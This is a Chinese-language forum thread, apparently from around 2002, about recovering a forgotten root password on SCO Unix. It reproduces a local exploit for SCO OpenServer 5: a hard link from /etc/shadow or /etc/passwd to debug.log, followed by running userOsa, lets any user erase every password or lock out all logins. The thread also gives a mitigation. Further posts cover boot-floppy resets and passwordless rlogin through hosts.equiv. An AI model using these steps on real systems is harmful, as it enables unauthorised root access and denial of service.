请各位快帮帮忙，我无意中把root密码给改了，更改的密码没记住，

buffullo

希望寂寞高手给予指教，邮箱为 BUFFULLO88@HOTMAIL.COM

ssun1cn

你说的是这个bug吧，我觉得说出来也无所谓，毕竟问题还是存在的，而且并非无法解决


SCO OpenServer 5 的大漏洞
-------------------------  


SCO UNIX 的大BUG!任何用户都可以破坏系统
sco unix有一个大bug
1.进入一个你可以写的目录。
2. ln /etc/shadow debug.log
3. /etc/sysadm.d/bin/userOsa >;>;bab
............................
则你的/etc/shadow文件已经被覆盖。任何人可以以任何帐户登录无须密码.
若第二步改为ln /etc/passwd debug.log 则谁也登不上来了！
>;>;bab 是任意敲入的
..........................是程序的显示
注意整个过程中不要离开当前可写目录！
已在unix 5.0.5 &5.0.4上验证。
原理：
SCO /etc/sysadm.d/bin/userOsa 这个程序在运行时会生成一个名叫
debug.log的文件这个文件用户属于root 组属于auth
与shadow文件的一致，而且此程序有BUG不会检查用户权限，因此可以覆盖任何文件，
包括passwd和shadow.你在一个可写目录中建立连接(ln命令)将某个文件指向debug.log文件运行userOsa时
它将出错信息写入log文件时实际上就覆盖了那个你想破坏的文件！

对于一些机器可以，但是有些SCO机器不知为何
如果SHADOW或PASSWORD文件不能联结，对于一些机器可以，但是有些SCO机器不知为何，不允许我LN这两个文件，报错，不知为何？
答：理论上只要对目录/etc 有读权限，就可以链接。在此例中估计必须用硬链接，若用符号链接ln -s
会因为权限问题未遂。
答复者：Mike Wolf
防范对策
chmod o-x userOsa即可

goodmao

log in with other user : informix


进入多用户模式：
1 $ln /etc/shadow /tmp/debug.log
2 $ch /tmp
3 $/etc/sysadm.d/bin/userOsa
4 回车
5 用root登陆，不要密码！！
切记sco上说有的用户都没的密码了！··
实验可以，不可仿效！！

ccblfkejc

下面引用由寂寞高手在 2002/11/05 04:04pm 发表的内容：
看了各位的解决办法，颇有微辞。其实对SCO Unix 5.X.X忘记口令一事，可以更方便且不伤身体搞掂。具体方法不便在此详述。

不知你的方法和我的是否一样？我用此方法有时可以有时不可以？！
可以的时候，一下，就把所有口令去了。
不可以的时候，提示“文件未找到”。
为了他人安全，建议不要公开发表！！！！！！

还有一种办法(前提是知道一普通用户口令)：
1.用boot软盘引导，mount /dev/hd0root /mnt
2.cd /mnt&#59;cd etc&#59;chmod 777 passwd
3.reboot
4.普通用户进入，vi /etc/passwd
5.将已知用户的id的那两个值改成0：3（和root一致）
6.重新注册，出现＃提示符了吧，passwd root
7.vi /etc/passwd将普通用户的值再改回来（切记！！！）
8.………………ok？   

johnsilver

一,制作boot和root盘,但在制作root时,要注意密码文件有可能是在password或在shadow中,故需把/etc/password和/etc/shadow也cp到root盘上.
个人意见.仅供参考.

wenwen

制root时，将vi命令拷上，启动丢密码的机器后，将本机器/etc/shadow文件的root的密码文字删除，重启root注册重输密码即可

legal

如在网络上，则可以作 rlogin登录，不要口令的。事先在etc/hosts.equive中添加

sageyu

寂寞高手:大家在此，都是为了交流，否则到此何为？说吧，我们喜耳恭听！

俺

寂寞高手

等待ing

xgtd

  其实又何必如此费事，根本就不需要这两个文件，只要删除这两个文件，系统重新启动root用户便可以登录，不过没有其它用户。